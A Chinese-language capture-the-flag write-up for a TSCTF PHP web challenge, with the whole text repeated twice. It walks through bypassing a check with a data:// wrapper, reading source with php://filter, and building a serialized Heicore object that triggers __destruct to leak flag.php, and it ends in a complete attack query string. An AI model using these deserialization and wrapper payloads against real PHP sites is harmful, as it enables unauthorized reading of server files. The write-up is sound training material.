【TSCTF
题目地址:
打开是个没用的网站,扫描一下~
访问/robots.txt,发现三个文件:
User-agent: *
Disallow: /relax.php
Disallow: /heicore.php
Disallow: /flag.php
其中只有/relax.php里有东西,查看源码:
这个是aaencode代码,直接扔进控制台运行,或者在线解密:
整理得:
$_ = $_GET['pw'];
$__ = $_GET['file'];
$___ = $_GET['(><)'];
if (isset($_) && (file_get_contents($_, 'r') === "Two thousand three hundred and thirty-three")) {echo '<img src="./images/13.jpg" alt=""><br>';include($__);
} else {echo '<img src="./images/1.gif" alt="">';
}
其中file_get_contents($_, 'r') === "Two thousand three hundred and thirty-three"可以用data://伪协议绕过;
下面还有个include($__);,想用file=flag.php用include来包含flag,却回显“It’s not that simple”,是我太天真了!
于是构造php://filter伪协议来读取heicore.php和relax.php的源码
heicore.php:
<?php
class Heicore{public $file;public function __destruct(){if(isset($this->file)){echo file_get_contents($this->file);}}
}
relax.php:
<?php
error_reporting(E_ALL^E_NOTICE^E_WARNING);
$_ = $_GET['pw'];
$__ = $_GET['file'];
$___ = $_GET['(><)'];
if(isset($_)&&(file_get_contents($_,'r')==="Two thousand three hundred and thirty-three")){echo '<img src="./images/13.jpg" alt=""><br>';if(preg_match("/flag/i",$__)){echo "It's not that simple";exit();}else{include($__);unserialize($___);}}elseecho '<img src="./images/1.gif" alt="">'; } ?>
终于拿到了完整的源码,的确是过滤了flag
可以看到heicore.php中的析构函数会输出$file,所以把它包含进来,并让其成员$file等于flag.php,由于调用了函数unserialize(),我们就利用反序列化触发魔术方法__destruct()来输出flag;
<?php
class Heicore {public $file = 'php://filter/read=convert.base64-encode/resource=flag.php';}
$a = new Heicore();
$b = serialize($a);
echo $b;
#O:7:"Heicore":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}
构造的payload:
?pw=data:text/plain,Two%20thousand%20three%20hundred%20and%20thirty-three&file=heicore.php&(><)=O:7:"Heicore":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}
解base64
【TSCTF
题目地址:
打开是个没用的网站,扫描一下~
访问/robots.txt,发现三个文件:
User-agent: *
Disallow: /relax.php
Disallow: /heicore.php
Disallow: /flag.php
其中只有/relax.php里有东西,查看源码:
这个是aaencode代码,直接扔进控制台运行,或者在线解密:
整理得:
$_ = $_GET['pw'];
$__ = $_GET['file'];
$___ = $_GET['(><)'];
if (isset($_) && (file_get_contents($_, 'r') === "Two thousand three hundred and thirty-three")) {echo '<img src="./images/13.jpg" alt=""><br>';include($__);
} else {echo '<img src="./images/1.gif" alt="">';
}
其中file_get_contents($_, 'r') === "Two thousand three hundred and thirty-three"可以用data://伪协议绕过;
下面还有个include($__);,想用file=flag.php用include来包含flag,却回显“It’s not that simple”,是我太天真了!
于是构造php://filter伪协议来读取heicore.php和relax.php的源码
heicore.php:
<?php
class Heicore{public $file;public function __destruct(){if(isset($this->file)){echo file_get_contents($this->file);}}
}
relax.php:
<?php
error_reporting(E_ALL^E_NOTICE^E_WARNING);
$_ = $_GET['pw'];
$__ = $_GET['file'];
$___ = $_GET['(><)'];
if(isset($_)&&(file_get_contents($_,'r')==="Two thousand three hundred and thirty-three")){echo '<img src="./images/13.jpg" alt=""><br>';if(preg_match("/flag/i",$__)){echo "It's not that simple";exit();}else{include($__);unserialize($___);}}elseecho '<img src="./images/1.gif" alt="">'; } ?>
终于拿到了完整的源码,的确是过滤了flag
可以看到heicore.php中的析构函数会输出$file,所以把它包含进来,并让其成员$file等于flag.php,由于调用了函数unserialize(),我们就利用反序列化触发魔术方法__destruct()来输出flag;
<?php
class Heicore {public $file = 'php://filter/read=convert.base64-encode/resource=flag.php';}
$a = new Heicore();
$b = serialize($a);
echo $b;
#O:7:"Heicore":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}
构造的payload:
?pw=data:text/plain,Two%20thousand%20three%20hundred%20and%20thirty-three&file=heicore.php&(><)=O:7:"Heicore":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}
解base64
发布评论